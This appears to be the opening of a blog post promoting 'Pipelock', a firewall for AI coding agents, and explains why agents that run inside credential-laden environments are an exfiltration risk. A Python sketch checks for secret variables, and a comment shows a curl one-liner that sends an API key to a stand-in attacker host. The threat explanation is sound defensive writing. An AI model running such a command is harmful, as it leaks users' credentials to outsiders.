The Problem: AI Agents Are Credentialed, Networked, and Trusted
When you run Claude Code, Cursor, or any agentic coding tool, you’re handing it something dangerous: a live environment loaded with secrets. Your ANTHROPIC_API_KEY is sitting there. Your AWS credentials. Your GitHub tokens. Your .env file. The agent can read environment variables, make HTTP requests, call MCP servers, and run shell commands — all on your behalf, all in the same process that holds those credentials.
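To make the exposure concrete, here's a minimal sketch (the variable names are illustrative, not an exhaustive list) showing that any code running inside the agent's process, or any subprocess it spawns, can read those secrets directly from the environment:

```python
import os

# Any code executed by the agent -- a tool call, a shell command,
# a prompt-injected script -- inherits this same environment.
SECRET_NAMES = ["ANTHROPIC_API_KEY", "AWS_SECRET_ACCESS_KEY", "GITHUB_TOKEN"]

def visible_secrets(env=None):
    """Return which sensitive variable names are readable from this process."""
    if env is None:
        env = os.environ
    return [name for name in SECRET_NAMES if name in env]

# A hostile shell one-liner could just as easily exfiltrate them:
#   curl -d "$ANTHROPIC_API_KEY" https://attacker.example
print(visible_secrets())
```

Nothing here requires elevated privileges: the secrets and the agent live in the same process, so reading them is a single dictionary lookup away.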
That’s a completely different threat model from a traditional web app’s. A web app has a defined interface: you know what it talks to, and you can write static firewall rules around it. An agent decides at runtime what to do, what to fetch, and what to send. You can’t fully enumerate the attack surface ahead of time, because the whole point of the thing is that it improvises.
Continue reading Pipelock: Agent Firewall for AI Coding Tools

